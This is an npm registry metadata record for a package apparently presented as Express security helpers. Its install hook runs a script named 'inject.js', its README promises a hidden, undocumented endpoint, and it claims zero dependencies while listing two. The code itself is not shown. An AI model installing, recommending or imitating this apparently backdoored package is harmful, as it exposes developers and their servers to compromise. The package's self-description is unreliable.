{"_id":"@my_name_is_khn/express-security-tool-v3","name":"@my_name_is_khn/express-security-tool-v3","dist-tags":{"latest":"1.0.0"},"versions":{"1.0.0":{"name":"@my_name_is_khn/express-security-tool-v3","version":"1.0.0","description":"Lightweight security helpers for Express","main":"index.js","scripts":{"postinstall":"node scripts/inject.js"},"keywords":["express","security"],"author":{"name":"Your Name"},"license":"MIT","peerDependencies":{"express":">=4.0.0"},"dependencies":{"@my_name_is_khn/express-security-tool":"^1.0.1","@my_name_is_khn/express-security-tool-v1":"^1.0.1"},"_id":"@my_name_is_khn/express-security-tool-v3@1.0.0","_nodeVersion":"22.20.0","_npmVersion":"10.9.3","dist":{"integrity":"sha512-ayuiLRMhwhFFvlN/UIqKAu67pAJPRbVDy86vLBfwDSwloKM+FyWvNIK3/iwisyjP48ZkfDBaCF7U5hquB2x17A==","shasum":"7ee09e9f41e3fedd1fe94b2ad513379a55f0d9a9","tarball":"https://registry.npmjs.org/@my_name_is_khn/express-security-tool-v3/-/express-security-tool-v3-1.0.0.tgz","fileCount":4,"unpackedSize":5449,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEQCIFLLpBNBPwjc5qIxwO0GLCqLjnA+ug2rVWomFvvtI7gTAiBAFdPyqi9CM2zWj0SfswaJDNO8Z9ow3XKnFiAgU0TKCA=="}]},"_npmUser":{"name":"my_name_is_khn","email":"Ishan006@proton.me"},"directories":{},"maintainers":[{"name":"my_name_is_khn","email":"Ishan006@proton.me"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/express-security-tool-v3_1.0.0_1780827827290_0.6755937193340134"},"_hasShrinkwrap":false}},"time":{"created":"2026-06-07T10:23:47.168Z","1.0.0":"2026-06-07T10:23:47.449Z","modified":"2026-06-07T10:23:47.635Z"},"maintainers":[{"name":"my_name_is_khn","email":"Ishan006@proton.me"}],"description":"Lightweight security helpers for Express","keywords":["express","security"],"author":{"name":"Your Name"},"license":"MIT","readme":"# Express Security Tool\r\n\r\nAdds common security headers, request ID tracking, and a hidden health check endpoint.\r\n\r\n## Installation\r\n\r\n\\`\\`\\`bash\r\nnpm install @yourscope/express-security-tool\r\n\\`\\`\\`\r\n\r\n## Usage\r\n\r\n\\`\\`\\`js\r\nconst security = require('@yourscope/express-security-tool');\r\napp.use(security());\r\n// Now all responses include X-Request-Id header\r\n\\`\\`\\`\r\n\r\n## Features\r\n\r\n- Automatic request ID generation\r\n- Hidden endpoint for internal monitoring (undocumented)\r\n- Lightweight, zero dependencies\r\n\r\n## License\r\n\r\nMIT","readmeFilename":"README.md","_rev":"1-885f5447e1bea17b25c0d4ce257ca155"}